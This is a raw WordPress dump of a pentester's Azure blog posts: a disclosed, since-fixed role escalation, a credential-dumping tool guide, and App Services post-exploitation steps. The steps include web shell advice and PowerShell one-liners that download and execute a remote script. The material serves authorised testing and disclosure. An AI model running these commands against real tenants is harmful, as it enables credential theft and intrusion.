Karl Fosaaen

Karl specializes in network and web application penetration testing. Karl holds a BS in Computer Science from the University of Minnesota and has over a decade of consulting experience in the computer security industry. In that time, he has worked with a variety of industries; including financial services, health care, and retail. Karl holds the Security+, CISSP, and GXPN certifications. In his spare time, Karl has volunteered at conferences including DEF CON, THOTCON, and AppSec USA. Karl has previously spoken at BsidesPDX, THOTCON, AppSec California, and DerbyCon.
More by Karl Fosaaen
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 
            [update_post_term_cache] => 1
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => SELECT   wp_posts.* FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id ) WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{d26c0c20f8c733f8516a3b3f5c581c9f70902f4b988d02847561f4a7a9f39164}\"10\"{d26c0c20f8c733f8516a3b3f5c581c9f70902f4b988d02847561f4a7a9f39164}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{d26c0c20f8c733f8516a3b3f5c581c9f70902f4b988d02847561f4a7a9f39164}\"10\"{d26c0c20f8c733f8516a3b3f5c581c9f70902f4b988d02847561f4a7a9f39164}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish')) GROUP BY wp_posts.ID ORDER BY wp_posts.post_date DESC 
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 11855
                    [post_author] => 10
                    [post_date] => 2021-09-13 10:00:00
                    [post_date_gmt] => 2021-09-13 15:00:00
                    [post_content] => 

TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Based off the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We need to be an Owner on the subscription to create this account, as contributors do not have rights to add the Run As account.

Add Automation Account

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

Access Control

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.

Role added

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount
 
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AZPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint Subject
---------- -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5
Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
[AzureUSGovernment, AzureUSGovernment]}
Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant
Account Subscription
------- ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :
LAC Contributor

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

Custom Azure Automation Contributor Role

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions: 

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.

Looking for an Azure pentesting partner? Consider NetSPI.

[post_title] => Escalating Azure Privileges with the Log Analytics Contributor Role [post_excerpt] => Learn how cloud pentesting expert Karl Fosaaen found and reported a Microsoft Azure vulnerability that allowed an Azure AD user to escalate from the Log Analytics Contributor role to the full Subscription Contributor role. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => escalating-azure-privileges-with-the-log-analystics-contributor-role [to_ping] => [pinged] => [post_modified] => 2021-09-10 16:41:52 [post_modified_gmt] => 2021-09-10 21:41:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11855 [menu_order] => 3 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 26141 [post_author] => 53 [post_date] => 2021-08-13 15:12:35 [post_date_gmt] => 2021-08-13 20:12:35 [post_content] =>

Date: Wednesday, September 22
Time: 12:00 - 1:00 PM CT

Whether it's the migration of legacy systems or the creation of brand-new applications, many organizations are turning to Microsoft’s Azure cloud as their platform of choice. This brings new challenges for penetration testers who are less familiar with the platform, and now have more attack surfaces to exploit. In an attempt to automate some of the common Azure escalation tasks, the MicroBurst toolkit was created to contain tools for attacking different layers of an Azure tenant. In this talk, we will be focusing on the password extraction functionality included in MicroBurst. We will review many of the places that passwords can hide in Azure, and the ways to manually extract them. For convenience, we will also show how the Get-AzPasswords function can be used to automate the extraction of credentials from an Azure tenant. Finally, we will review a case study on how this tool was recently used to find a critical issue in the Azure permissions model that resulted in a fix from Microsoft.

[post_title] => Azure Pentesting: Extracting All the Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-pentesting-extracting-all-the-azure-passwords [to_ping] => [pinged] => [post_modified] => 2021-08-13 15:12:36 [post_modified_gmt] => 2021-08-13 20:12:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=26141 [menu_order] => 1 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 11753 [post_author] => 10 [post_date] => 2020-10-22 07:00:26 [post_date_gmt] => 2020-10-22 07:00:26 [post_content] =>

It has been a while since the initial release (August 2018) of the Get-AzurePasswords module within MicroBurst, so I figured it was time to do an overview post that explains how to use each option within the tool. Since each targeted service in the script has a different way of getting credentials, I want users of the tool to really understand how things are working.

For those that just want to jump to information on specific services, here's links to each section:

Additionally, we've renamed the function to Get-AzPasswords to match the PowerShell modules that we're using in the function.

AzureRM Versus Az

As of March 19, 2020, we pushed some changes to MicroBurst to switch the cmdlets over to the Az PowerShell modules (from AzureRM). This was a much needed switch, as the AzureRM modules are being replace by the Az modules.

Along with these updates I also wanted to make some additions to the Get-AzurePasswords functionality. Since we reorganized all of the code in MicroBurst to match up with the related supporting modules (Az, AzureAD, MSOL, etc.), we thought it was important to separate out function names based off of the modules the script was using.

Modules

Going forward, Get-AzurePasswords will still live in the AzureRM folder in MicroBurst, but it will not be updated with any new functionality. Going forward, I highly recommend that everyone switches over to the newly renamed version "Get-AzPasswords" in the Az folder in MicroBurst.

Important Script Usage Note - Some of these functions can make minor temporary changes to an Azure subscription (see Automation Accounts). If you Ctrl+C during the script execution, you may end up with unintended files or changes in your subscription.

I'll cover each of these concerns in the sections below, but have patience when running these functions. I know Azure can have its slow moments, so (in most cases) just give the script a moment to catch up and everything should be good. I haven't been keeping track, but I believe I've lost several months of time waiting for automation runbook jobs to complete.

Function Usage

For each service section, I've noted the script flag that you can use to toggle ("-Keys Y" versus "-Keys N") the collection of that specific service. Running the script with no flags will gather credentials from all services.

Step 1. Import the MicroBurst Module

PS C:\MicroBurst> Import-Module .MicroBurst.psm1
Imported Az MicroBurst functions
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Step 2. Authenticate to the Azure Tenant

PS C:\MicroBurst> Login-AzAccount

Account           SubscriptionName  TenantId                             Environment
-------           ----------------  --------                             -----------
test@example.com  TestSubscription  4712345a-6543-b5s4-a2b2-e01234567895 AzureCloud

Step 3. Gather Passwords

PS C:\MicroBurst> Get-AzPasswords -Verbose
VERBOSE: Logged In as test@example.com
VERBOSE: Getting List of Key Vaults...
VERBOSE:  Exporting items from testingKeys
VERBOSE:   Getting Key value for the testKey Key
VERBOSE:   Getting Secret value for the TestKey Secret
VERBOSE: Getting List of Azure App Services...
VERBOSE:  Profile available for microburst-application
VERBOSE: Getting List of Azure Container Registries...
VERBOSE: Getting List of Storage Accounts...
VERBOSE:  Getting the Storage Account keys for the teststorage account
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE:  Getting the RunAs certificate for autoadmin using the XZvOYzsuBiGbfqe.ps1 Runbook
VERBOSE:   Waiting for the automation job to complete
VERBOSE:    Run AuthenticateAs-autoadmin-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE:   Removing XZvOYzsuBiGbfqe runbook from autoadmin Automation Account
VERBOSE:  Getting cleartext credentials for the autoadmin Automation Account
VERBOSE:   Getting cleartext credentials for test using the dOFtWgEXIQLlRfv.ps1 Runbook
VERBOSE:    Waiting for the automation job to complete
VERBOSE:    Removing dOFtWgEXIQLlRfv runbook from autoadmin Automation Account
VERBOSE: Password Dumping Activities Have Completed

*Running this will "Out-GridView" prompt you to select the subscription(s) to gather credentials from.

For easier output management, I'd recommend piping the output to either "Out-GridView" or "Export-CSV".

With that housekeeping out of the way, let's dive into the credentials that we're able to gather with Get-AzPasswords.

Key Vaults (-Keys Y)

Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores.

Vault access is controlled by the Access Policies in each vault, but any users with Contributor rights are able to give themselves access to a Key Vault. Get-AzPasswords will not modify any Key Vault Access Policies, but you could give your account read permissions on the vault if you really needed to read a key.

An example Key Vault Secret:

Keyvault

Get-AzPasswords will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificate files locally with the "-ExportCerts Y" flag.

Sample Output:

Type : Key
Name : DiskKey
Username : N/A
Value : {"kid":"https://notArealVault.vault.azure.net/keys/DiskKey/63abcdefghijklmnop39","kty ":"RSA","key_ops":["sign","verify","wrapKey","unwrapKey","encrypt","decrypt"],"n":"v[REDACTED]w","e":"AQAB"}
PublishURL : N/A
Created : 5/19/2020 5:20:12 PM
Updated : 5/19/2020 5:20:12 PM
Enabled : True
Content Type : N/A
Vault : notArealVault
Subscription : NotARealSubscription

Type : Secret
Name : TestKey
Username : N/A
Value : Karl'sPassword
PublishURL : N/A
Created : 3/7/2019 9:28:37 PM
Updated : 3/7/2019 9:28:37 PM
Enabled : True
Content Type : Password
Vault : notArealVault
Subscription : NotARealSubscription

Finally, access to the Key Vaults may be restricted by network, so you may need to run this from an Azure VM on the subscription, or from an IP in the approved "Private endpoint and selected networks" list. These settings can be found under the Networking tab in the Azure portal.

Alternatively, you may need to use an automation account "Run As" account to request the keys. Steps to complete that process are outlined here.

App Services (-AppServices Y)

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles.

In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile.

Appservices

These publish profiles will contain Web and FTP credentials that can be used to get access to the App Service's files. In addition to that, any stored connection strings should also be available in the file. All available profile credentials are all parsed by Get-AzPasswords, so it's easy to gather credentials for multiple App Services applications at once.

Sample Output:

Type         : AppServiceConfig
Name         : appServicesApplication - Web Deploy
Username     : $appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : appServicesApplication.scm.azurewebsites.net:443
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type         : AppServiceConfig
Name         : appServicesApplication - FTP
Username     : appServicesApplication$appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : ftp://appServicesApplication.ftp.azurewebsites.windows.net/site/wwwroot
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type : AppServiceConfig
Name : appServicesApplication-Custom-ConnectionString
Username : N/A
Value : metadata=res://*/Models.appServicesApplication.csdl|res://*/Models.appServicesApplication.ssdl|res://*/Models.appServicesApplication.msl;provider=System.Data.SqlClient;provider connection string="Data Source=abcde.database.windows.net;Initial Catalog=app_Enterprise_Prod;Persist Security Info=True;User ID=psqladmin;Password=somepassword9" 
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : ConnectionString
Vault : N/A
Subscription : NotARealSubscription

Potential next steps for App Services have been outlined in another NetSPI blog post here.

Automation Accounts (-AutomationAccounts Y)

Automation Accounts are one of the ways that you can automate jobs and routine tasks within Azure. These tasks (Runbooks) are frequently run with stored credentials, or with the service account (Run As "Connections") tied to the Automation Account.

Automation

Both of these credential types can be returned with Get-AzPasswords and can potentially allow for privilege escalation. In order to gather these credentials from the Automation Accounts, we need to create new runbooks that will cast the credentials out to variables that are then printed to the runbook job output.

To protect these credentials in the output, we've implemented an encryption scheme in Get-AzPasswords that encrypts the job output.

Enccreds

The Run As certificates (covered in another blog) can then be used to authenticate (run the AuthenticateAs PS1 script) from your testing system as the stored Run As connection.

Authas

Any stored credentials may have a variety of uses, but I've frequently seen domain accounts being stored here, so that can lead to some interesting lateral movement options.

Sample Output:

Type : Azure Automation Account
Name : kfosaaen
Username : test
Value : testPassword
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : Password
Vault : N/A
Subscription : NotARealSubscription

As a secondary note here, you can also request bearer tokens for the Run As automation accounts from a custom runbook. I cover the process in this blog post, but I think it's worth noting here, since it's not included in Get-AzPasswords, but it is an additional way to get a credential from an Automation Account.

And one final note on gathering credentials from Automation Accounts. It was noted above, but sometimes Azure Automation Accounts can be slow to respond. If you're having issues getting a runbook to run and cancel the function execution before it completes, you will need to manually go in and clean up the runbooks that were created as part of the function execution.

Runbook

These will always be named with a 15-character random string of letters (IE: lwVSNvWYpPXCcDd). You will also have local files in your execution directory to clean up as well, and they will have the same name as the ones that were uploaded for execution.

Storage Account Keys (-StorageAccounts Y)

Storage Accounts are the multipurpose (Public/Private files, tables, queues) service for storing data in an Azure subscription. This section is pretty simple compared to the previous ones, but gathering the account keys is an easy way to maintain persistence in a sensitive data store. These keys can be used with the Azure storage explorer application to remotely mount storage accounts.

Storage

These access keys can easily be cycled, but if you're looking for persistence in a Storage Account, these would be your best bet. Additionally, if you're modifying Cloud Shell files for escalation/persistence, I'd recommend holding on to a copy of these keys for any Cloud Shell storage accounts.

Sample Output:

Type         : Storage Account
Name         : notArealStorageAccount
Username     : key1
Value        : W84[REDACTED]==
PublishURL   : N/A
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Key
Vault        : N/A
Subscription : NotARealSubscription

Azure Container Registries (-ACR Y)

Azure Container Registries are used in Azure to manage Docker images for use within Azure Kubernetes Service (AKS) or as container instances (either in Azure or elsewhere). More often than not, we will find keys and credentials stored in these container images.

In order to authenticate to the repositories, you can either use the AZ CLI with AzureAD credentials, or there can be an "Admin user". If you have AzureAD user rights to pull the admin password for a container registry, you should already have rights to authenticate to the repositories with the AZ CLI, but if an Admin user is enabled for the registry, this user could then be used for persistence when you lose access to the initial AzureAD user.

Container

Fun Fact - Any AzureAD user with "Reader" permissions on the Container Registry is able to connect to the repositories and pull images down with Docker.

For more information on using these credentials, here's another NetSPI blog.

Conclusion

There was a lot of ground to cover here, but hopefully this does a good job of explaining all of the functionality available in Get-AzPasswords. It's worth noting that most of this functionality relies on your AzureAD user having Contributor IAM rights on the applicable service. While some may argue that Contributor access is equivalent to admin in a subscription, I would argue that most subscriptions primarily consist of Contributor users.

If there are any sources for Azure passwords that you would like to see added to Get-AzPasswords, feel free to make a pull request on the MicroBurst GitHub repository.

[post_title] => A Beginners Guide to Gathering Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => a-beginners-guide-to-gathering-azure-passwords [to_ping] => [pinged] => [post_modified] => 2021-07-12 13:10:53 [post_modified_gmt] => 2021-07-12 18:10:53 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11753 [menu_order] => 95 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 11728 [post_author] => 10 [post_date] => 2020-08-17 07:00:59 [post_date_gmt] => 2020-08-17 07:00:59 [post_content] =>

We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we're running into more instances of applications being run on Azure App Services.

Top

Whenever we run into an App Services application with a serious vulnerability, I'll frequently get a ping asking about next steps to take in an Azure environment. This blog will hopefully answer some of those questions.

Initial Access

We will be primarily talking about command execution on an App Services host. There are plenty of other vulnerabilities (SQLi, SSRF, etc.) that we could put into the context of Azure App Services, but we'll save those for another blog.

For our command injection examples, we'll assume that you've used one of the following methods to execute commands on a system:

  • An uploaded web shell
  • Unintended CMD injection via an application issue
  • Intended CMD Injection through application functionality

Alternatively, keep in mind that Azure Portal Access (with an account with Contributor rights on an app) also allows you to run commands from the App Services Console. This will be important if there's a higher privileged Managed Identity in use by the app, and we want to use this to escalate Azure permissions.

Cmdsql

For the sake of simplicity, we'll also assume that this is a relatively clean command injection (See Web Shell), where you can easily see the results of your commands. If we want to get really complicated, we could talk about using side channels to exfiltrate command results, but that's also for another blog.

Azure "App Services"

To further complicate matters, Azure App Services encompasses "Function Apps" and "App Service Apps". There are some key differences between the two, but for the purposes of this blog, we'll consider them to be the same. Additionally, there are Linux and Windows options for both, so we'll try to cover options for those as well.

If you want to follow along with your own existing App Services app, you can use the Console (or SSH) section in the Development Tools section of the Azure Portal for your App Services app.

Appservices

Choose Your Own Adventure

With command execution on the App Services host, there are a couple of paths that you can take:

Looking Locally

First things first, this is an application server, so you might want to look at the application files.

  • The application source code files can (typically) be found at the %DEPLOYMENT_SOURCE%
  • The actual working files for the application can (typically) be found at %DEPLOYMENT_TARGET%
  • Or /home/site/wwwroot if you're working with a Linux system
Locally

If you're operating on a bare bones shell at this point, I would recommend pulling down an appropriate web shell to your %DEPLOYMENT_TARGET% (or /home/site/wwwroot) directory. This will allow you to upgrade your shell and allow you to better explore the host.

Just remember, this app server is likely facing the internet and a web shell without a password easily becomes someone else's web shell.

Within the source code files, you can also look for common application configuration files (web.config, etc.) that might contain additional secrets that you could use to pivot through to other services (as we'll see later in the blog).

Looking at the Environment

On an App Services host, most of your configuration variables will be available as environmental variables on the host. These variables will most likely contain keys that we can use to pivot to other Azure services in the subscription.

Since you're most likely to have a cmd.exe shell, you can just use the "set" command to list out all of the environmental variables. It will look like this (without the redactions):

Env Win

If you're using PowerShell for your command execution, you can use the "dir env: | ft -Wrap " command to do the same. Make sure that you're piping to "ft -wrap" as that will allow the full text values to be returned without being truncated.

Alternatively, if you're in a Linux shell, you can use the "printenv" command to accomplish the same:

Env Linux

Now that we (hopefully) have some connection strings for Azure services, we can start getting into other services.

Accessing Storage Accounts

If you're able to find an Azure Storage Account connection string, you should be able to remotely mount that storage account with the Azure Storage Explorer.

Here are a couple of common Windows environmental variables that hold those connection strings:

  • APPSETTING_AzureWebJobsStorage
  • APPSETTING_WEBSITE_CONTENTAZUREFILECONNECTIONSTRING
  • AzureWebJobsStorage
  • WEBSITE_CONTENTAZUREFILECONNECTIONSTRING

Additionally, you may find these strings in the application configuration files. Keep an eye out for any config files containing "core.windows.net", storage, blob, or file in them.

Using the Azure Storage Explorer, copy the Storage Account connection string and use that to add a new Storage Account.

Storage

Now that you have access to the Storage Account, you should be able to see any files that the application has rights to.

Storage


Accessing Azure SQL Databases

Similar to the Storage Accounts, you may find connection strings for Azure SQL in the configuration files or environmental variables. Most Azure SQL servers that I encounter have access locked down to specific IP ranges, so you may not be able to remotely access the servers from the internet. Every once in a while, we'll find a server with 0.0.0.0-255.255.255.255 in their allowed list, but that's pretty rare.

Azuresql

Since direct SQL access from the internet is unlikely, we will need an alternative that works from within the App Services host.

Azure SQL from Windows:

For Windows, we can plug in the values from our connection string and make use of PowerUpSQL to access Azure SQL databases.

Confirm Access to the "sql-test" Database on the "netspi-test" Azure SQL server:

D:homesitewwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLConnectionTest -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 | ft -wrap"


ComputerName                     Instance                         Status    
------------                     --------                         ------    
netspi-test.database.windows.net netspi-test.database.windows.net Accessible

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

D:homesitewwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLQuery -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 -Query 'select @@version' | ft -wrap"


Column1                                                                        
-------                                                                        
Microsoft SQL Azure (RTM) - 12.0.2000.8                                        
    Jul 31 2020 08:26:29                                                          
    Copyright (C) 2019 Microsoft Corporation

From here, you can modify the query to search the database for more information.

For more ideas on pivoting via Azure SQL, check out the PowerUpSQL GitHub repository and Scott Sutherland's NetSPI blog author page.

Azure SQL from Linux:

For Linux hosts, you will need to check the stack that you're running (Node, Python, PHP, .NET Core, Ruby, or Java). In your shell, "printenv | grep -i version" and look for things like RUBY_VERSION or PYTHON_VERSION.

For simplicity, we will assume that we are set up with the Python Stack and pyodbc is already installed as a module. For this, we will use a pretty basic Python script to query the database.

Other stacks will (most likely) require some different scripting or clients that are more compatible with the provided stack, but we'll save that for another blog.

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

root@567327e35d3c:/home# cat sqlQuery.py
import pyodbc
server = 'netspi-test.database.windows.net'
database = 'sql-test'
username = 'MyUser'
password = '123Password456'
driver= '{ODBC Driver 17 for SQL Server}'

with pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=1433;DATABASE='+database+';UID='+username+';PWD='+ password) as conn:
        with conn.cursor() as cursor:
                cursor.execute("SELECT @@version")
                row = cursor.fetchone()
                while row:
